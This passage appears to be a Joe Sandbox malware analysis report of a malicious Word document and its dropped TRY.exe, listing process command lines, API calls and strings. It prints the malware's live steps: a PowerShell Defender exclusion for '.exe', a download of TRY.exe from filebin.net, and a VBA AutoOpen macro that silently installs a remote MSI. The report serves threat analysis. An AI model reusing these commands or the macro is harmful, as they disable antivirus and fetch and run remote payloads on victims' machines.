Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	15
Start time:	09:28:30
Start date:	20/04/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Imagebase:	0x7ff619710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	17
Start time:	09:28:38
Start date:	20/04/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Imagebase:	0x7ff619710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	18
Start time:	09:28:39
Start date:	20/04/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff74afc0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	21
Start time:	09:28:46
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Imagebase:	0xce0000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	22
Start time:	09:28:46
Start date:	20/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	24
Start time:	09:28:52
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"
Imagebase:	0x1100000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	25
Start time:	09:28:53
Start date:	20/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
AutoOpenAPIs: 3, Strings: 3, Number of lines: 7, Relevance: 16.007

APIs	Meta Information
CreateObject	CreateObject("WindowsInstaller.Installer")
UILevel
InstallProduct

Strings	Decrypted Strings
"WindowsInstaller.Installer"
""""
"https://filebin.net/rf43v6qzghbj7h7b/TRY.msi"

Line	Instruction	Meta Information
9	Sub AutoOpen()
10	On Error Resume Next	executed
11	Dim msi as Object
12	Set msi = CreateObject("WindowsInstaller.Installer")	CreateObject("WindowsInstaller.Installer") executed
13	msi.UILevel = 2	UILevel
15	msi.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi", ""	InstallProduct
16	End Sub

Reset < >

Analysis Process: TRY.exePID: 5860, Parent PID: 6020COMMON

Execution Graph

Execution Coverage:	28.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	43.6%
Total number of Nodes:	906
Total number of Limit Nodes:	48

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF6BAC43E4C Relevance: 56.4, APIs: 18, Strings: 14, Instructions: 360
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6BAC43EDC
CompareStringA.KERNEL32 ref: 00007FF6BAC43FA3

Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
Part of subcall function 00007FF6BAC44CC0: SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
Part of subcall function 00007FF6BAC44CC0: LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
Part of subcall function 00007FF6BAC44CC0: LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
Part of subcall function 00007FF6BAC44CC0: memcpy_s.MSVCRT ref: 00007FF6BAC44D40
Part of subcall function 00007FF6BAC44CC0: FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

CompareStringA.KERNEL32 ref: 00007FF6BAC44095
GetProcAddress.KERNEL32 ref: 00007FF6BAC4412B
FreeLibrary.KERNEL32 ref: 00007FF6BAC441F6
LocalFree.KERNEL32 ref: 00007FF6BAC44220
FreeLibrary.KERNEL32 ref: 00007FF6BAC4423D
LocalFree.KERNEL32 ref: 00007FF6BAC44246
FreeLibrary.KERNEL32 ref: 00007FF6BAC442A4
LocalFree.KERNEL32 ref: 00007FF6BAC442AF
GetLastError.KERNEL32 ref: 00007FF6BAC442B5
LocalFree.KERNEL32 ref: 00007FF6BAC4431D
RegOpenKeyExA.ADVAPI32 ref: 00007FF6BAC4436D
RegQueryValueExA.ADVAPI32 ref: 00007FF6BAC443AC
memset.MSVCRT ref: 00007FF6BAC443CC
GetSystemDirectoryA.KERNEL32 ref: 00007FF6BAC443DB
RegSetValueExA.ADVAPI32 ref: 00007FF6BAC44458
RegCloseKey.ADVAPI32 ref: 00007FF6BAC44463

Strings

POSTRUNPROGRAM, xrefs: 00007FF6BAC44056
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC4415C, 00007FF6BAC443FB
DoInfInstall, xrefs: 00007FF6BAC44121, 00007FF6BAC44283
REBOOT, xrefs: 00007FF6BAC43EAB
ADMQCMD, xrefs: 00007FF6BAC43F5A
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF6BAC44411
RUNPROGRAM, xrefs: 00007FF6BAC43FC6
tha, xrefs: 00007FF6BAC44144
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF6BAC4435F
USRQCMD, xrefs: 00007FF6BAC43F6B
wextract_cleanup0, xrefs: 00007FF6BAC4438A, 00007FF6BAC44441
advpack.dll, xrefs: 00007FF6BAC442D9
SHOWWINDOW, xrefs: 00007FF6BAC43F00
<None>, xrefs: 00007FF6BAC43F85, 00007FF6BAC44077

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindStringValuememset$AddressCloseDirectoryErrorLastLoadLockOpenProcQuerySizeofSystemmemcpy_s
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$tha$wextract_cleanup0
API String ID: 4182703008-290479480
Opcode ID: 09c7cf43c8274c5d42e8a7ec65101bbff5f8043f953bd58f5ab1a46b1a85d3b8
Instruction ID: 9876fbe56be8120a228aa26ac43a6a880e658da03015bd1cc1b2ec6e1ff6467c
Opcode Fuzzy Hash: 09c7cf43c8274c5d42e8a7ec65101bbff5f8043f953bd58f5ab1a46b1a85d3b8
Instruction Fuzzy Hash: 01F18F75A0C65286FB609B29E9582BA37B0FF84748F5001B6DF4E83AA4DF3CE545C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC41C38 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 169
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6BAC41C7A
memset.MSVCRT ref: 00007FF6BAC41C88
RegCreateKeyExA.KERNELBASE ref: 00007FF6BAC41CCA

Part of subcall function 00007FF6BAC41144: _vsnprintf.MSVCRT ref: 00007FF6BAC41181

RegQueryValueExA.KERNELBASE ref: 00007FF6BAC41D19
RegCloseKey.ADVAPI32 ref: 00007FF6BAC41D32
GetSystemDirectoryA.KERNEL32 ref: 00007FF6BAC41D4A
LoadLibraryA.KERNELBASE ref: 00007FF6BAC41D66
GetProcAddress.KERNEL32 ref: 00007FF6BAC41D82
FreeLibrary.KERNELBASE ref: 00007FF6BAC41D95
GetSystemDirectoryA.KERNEL32 ref: 00007FF6BAC41DAB
LocalAlloc.KERNEL32 ref: 00007FF6BAC41E01
GetModuleFileNameA.KERNEL32 ref: 00007FF6BAC41E3E
RegCloseKey.ADVAPI32 ref: 00007FF6BAC41E4D
RegSetValueExA.KERNELBASE ref: 00007FF6BAC41EB4
RegCloseKey.KERNELBASE ref: 00007FF6BAC41EBF
LocalFree.KERNEL32 ref: 00007FF6BAC41EC8

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF6BAC41C9A
wextract_cleanup0, xrefs: 00007FF6BAC41CEC, 00007FF6BAC41D07, 00007FF6BAC41E99
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC41DCC
DelNodeRunDLL32, xrefs: 00007FF6BAC41D78
advpack.dll, xrefs: 00007FF6BAC41D50
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF6BAC41E75
%s /D:%s, xrefs: 00007FF6BAC41E60
wextract_cleanup%d, xrefs: 00007FF6BAC41CE0

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-1709460465
Opcode ID: c918c3741f8081852428a954488d33e3bc1eed64e202b9aa7f62eab9bf8d0600
Instruction ID: 9f967b2767bd2cbdc3543f56300f0d237bc8e267ee18c87ebf56d02c14eebb28
Opcode Fuzzy Hash: c918c3741f8081852428a954488d33e3bc1eed64e202b9aa7f62eab9bf8d0600
Instruction Fuzzy Hash: 13718336B18B5286EB208F69E8982A967B0FF84B54F401172DF4E87B65DF3CE505C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC415F8 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 340
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringA.KERNEL32 ref: 00007FF6BAC417AC
GetFileAttributesA.KERNEL32 ref: 00007FF6BAC417C0
LocalAlloc.KERNEL32 ref: 00007FF6BAC41827
GetPrivateProfileIntA.KERNEL32 ref: 00007FF6BAC4185E
GetPrivateProfileStringA.KERNEL32 ref: 00007FF6BAC4189B
GetShortPathNameA.KERNEL32 ref: 00007FF6BAC41902

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

Strings

Command.com /c %s, xrefs: 00007FF6BAC419AA
.BAT, xrefs: 00007FF6BAC41981
.INF, xrefs: 00007FF6BAC4178E
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC41724
AdvancedINF, xrefs: 00007FF6BAC41885
Reboot, xrefs: 00007FF6BAC4184D
setupx.dll, xrefs: 00007FF6BAC418FB
Version, xrefs: 00007FF6BAC4188C
DefaultInstall, xrefs: 00007FF6BAC4183E
setupapi.dll, xrefs: 00007FF6BAC4190A
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00007FF6BAC4191E

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-1383298736
Opcode ID: a793dbcf6d60e1086112152d955568a691023bac3085031e145d8b0cee9e5232
Instruction ID: 5b60a13c9ca502c0adf5fd1b8742ee2229d3fb76aa0219c2a1fae2bbb696d584
Opcode Fuzzy Hash: a793dbcf6d60e1086112152d955568a691023bac3085031e145d8b0cee9e5232
Instruction Fuzzy Hash: 8BE1CF62B0878285EF218F28E4492FA67B1EB45794F5411B6DF8D83B99DF3DE509C308

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC46028 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 289
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
Part of subcall function 00007FF6BAC44CC0: SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
Part of subcall function 00007FF6BAC44CC0: LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
Part of subcall function 00007FF6BAC44CC0: LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
Part of subcall function 00007FF6BAC44CC0: memcpy_s.MSVCRT ref: 00007FF6BAC44D40
Part of subcall function 00007FF6BAC44CC0: FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

LocalAlloc.KERNEL32 ref: 00007FF6BAC46074
GetLastError.KERNEL32 ref: 00007FF6BAC460A2
lstrcmpA.KERNEL32 ref: 00007FF6BAC46116
LocalFree.KERNEL32 ref: 00007FF6BAC46137
LocalFree.KERNEL32 ref: 00007FF6BAC460FA

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

GetTempPathA.KERNEL32 ref: 00007FF6BAC461BD
GetDriveTypeA.KERNEL32 ref: 00007FF6BAC46253
GetFileAttributesA.KERNEL32 ref: 00007FF6BAC4626A
GetDiskFreeSpaceA.KERNEL32 ref: 00007FF6BAC462BC
MulDiv.KERNEL32 ref: 00007FF6BAC462D9
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BAC46347
GetFileAttributesA.KERNEL32 ref: 00007FF6BAC46366
CreateDirectoryA.KERNEL32 ref: 00007FF6BAC46378
SetFileAttributesA.KERNEL32 ref: 00007FF6BAC463A2

Part of subcall function 00007FF6BAC47304: FindResourceA.KERNEL32 ref: 00007FF6BAC4732E
Part of subcall function 00007FF6BAC47304: LoadResource.KERNEL32 ref: 00007FF6BAC4733F
Part of subcall function 00007FF6BAC47304: DialogBoxIndirectParamA.USER32 ref: 00007FF6BAC4736F
Part of subcall function 00007FF6BAC47304: FreeResource.KERNEL32 ref: 00007FF6BAC4737B

GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BAC46408

Strings

Z, xrefs: 00007FF6BAC46243
A:\, xrefs: 00007FF6BAC46202
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC461AA
msdownld.tmp, xrefs: 00007FF6BAC4634D
<None>, xrefs: 00007FF6BAC4610C
RUNPROGRAM, xrefs: 00007FF6BAC4605C, 00007FF6BAC460C6

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 3973824516-559629209
Opcode ID: 9c3354b94b7b796a78583e6e0ec85fe5c451f8974544e8fea021b2fe829697d1
Instruction ID: 6049b12c0b90a340d0c9d76d5c4841dc2e5595ed1fc8d4e0c9d3cdcbfcc020d4
Opcode Fuzzy Hash: 9c3354b94b7b796a78583e6e0ec85fe5c451f8974544e8fea021b2fe829697d1
Instruction Fuzzy Hash: B4C1A362B1C68292EB208B29E4582BA77B1FF85744F5040B5DF8EC3699DF3DE805C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC465B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 216
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF6BAC465FA
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6BAC46603
GetLastError.KERNEL32 ref: 00007FF6BAC4662F
GetDiskFreeSpaceA.KERNELBASE ref: 00007FF6BAC4667B
MulDiv.KERNEL32 ref: 00007FF6BAC466A1
GetVolumeInformationA.KERNELBASE ref: 00007FF6BAC466D9
memset.MSVCRT ref: 00007FF6BAC466F1
GetLastError.KERNEL32 ref: 00007FF6BAC466F6
GetLastError.KERNEL32 ref: 00007FF6BAC46710
FormatMessageA.KERNEL32 ref: 00007FF6BAC46735
SetCurrentDirectoryA.KERNEL32 ref: 00007FF6BAC468DA

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC465C6

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CurrentDirectoryErrorLast$Message$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 948580687-1193786559
Opcode ID: 1d10b06ffb60c2f9a4994c8529384c1a3f72a6229e0869c97220415a699bab90
Instruction ID: dfde9c2469712210376ea9d4afe0b739eebc0147f4505263f25fc47013ebda3c
Opcode Fuzzy Hash: 1d10b06ffb60c2f9a4994c8529384c1a3f72a6229e0869c97220415a699bab90
Instruction Fuzzy Hash: 9D918176A1874286E720DF29E4886AA77B5FB84748F500179DF8E83B98DF3DD445CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC42B24 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 171
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6BAC42B78
memset.MSVCRT ref: 00007FF6BAC42B8C

Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
Part of subcall function 00007FF6BAC44CC0: SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
Part of subcall function 00007FF6BAC44CC0: LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
Part of subcall function 00007FF6BAC44CC0: LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
Part of subcall function 00007FF6BAC44CC0: memcpy_s.MSVCRT ref: 00007FF6BAC44D40
Part of subcall function 00007FF6BAC44CC0: FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

CreateEventA.KERNEL32 ref: 00007FF6BAC42BC9
SetEvent.KERNEL32 ref: 00007FF6BAC42BD9
CreateMutexA.KERNEL32 ref: 00007FF6BAC42C6A
GetLastError.KERNEL32 ref: 00007FF6BAC42C7C
FindResourceA.KERNEL32 ref: 00007FF6BAC42D3C
LoadResource.KERNEL32 ref: 00007FF6BAC42D4D

Part of subcall function 00007FF6BAC439A0: GetVersionExA.KERNEL32 ref: 00007FF6BAC439EB

#17.COMCTL32 ref: 00007FF6BAC42D5F
CloseHandle.KERNEL32 ref: 00007FF6BAC42CDC

Part of subcall function 00007FF6BAC44A70: LoadStringA.USER32 ref: 00007FF6BAC44B04
Part of subcall function 00007FF6BAC44A70: MessageBoxA.USER32 ref: 00007FF6BAC44B3E

Strings

TITLE, xrefs: 00007FF6BAC42BA7
VERCHECK, xrefs: 00007FF6BAC42D32
, xrefs: 00007FF6BAC42CC3
EXTRACTOPT, xrefs: 00007FF6BAC42BEA
tha, xrefs: 00007FF6BAC42BA0, 00007FF6BAC42C8C
INSTANCECHECK, xrefs: 00007FF6BAC42C44

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$tha
API String ID: 3100096412-3380029818
Opcode ID: 99a5b2a0ec1b945be53423b18da261cd1a6f7f9ebb90be66510584ff9c7f5bf8
Instruction ID: c6fed779ac0bdeed515573fc8691cb996be32f0c7fcf389ef4653c7c2ae83a9e
Opcode Fuzzy Hash: 99a5b2a0ec1b945be53423b18da261cd1a6f7f9ebb90be66510584ff9c7f5bf8
Instruction Fuzzy Hash: 95816831E0CA5382FB21AF2DA85A7B926B0AF94784F5000B5DF4EC66A5DF7CA545C60C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45940 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44CE8
Part of subcall function 00007FF6BAC44CC0: SizeofResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44CF3
Part of subcall function 00007FF6BAC44CC0: FindResourceA.KERNEL32 ref: 00007FF6BAC44D13
Part of subcall function 00007FF6BAC44CC0: LoadResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D1E
Part of subcall function 00007FF6BAC44CC0: LockResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D27
Part of subcall function 00007FF6BAC44CC0: memcpy_s.MSVCRT ref: 00007FF6BAC44D40
Part of subcall function 00007FF6BAC44CC0: FreeResource.KERNEL32(?,?,00000000,00007FF6BAC42BB3), ref: 00007FF6BAC44D49

FindResourceA.KERNEL32 ref: 00007FF6BAC45970
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6BAC43029), ref: 00007FF6BAC4597B
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6BAC43029), ref: 00007FF6BAC45984
GetDlgItem.USER32 ref: 00007FF6BAC459AB
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6BAC43029), ref: 00007FF6BAC459B6
GetDlgItem.USER32 ref: 00007FF6BAC459C8
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6BAC43029), ref: 00007FF6BAC459D6
#20.CABINET ref: 00007FF6BAC45A43
#22.CABINET ref: 00007FF6BAC45A83
#23.CABINET ref: 00007FF6BAC45A92
FreeResource.KERNEL32 ref: 00007FF6BAC45AD5
SendMessageA.USER32 ref: 00007FF6BAC45B31

Strings

CABINET, xrefs: 00007FF6BAC4594D, 00007FF6BAC45967
*MEMCAB, xrefs: 00007FF6BAC45A74

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
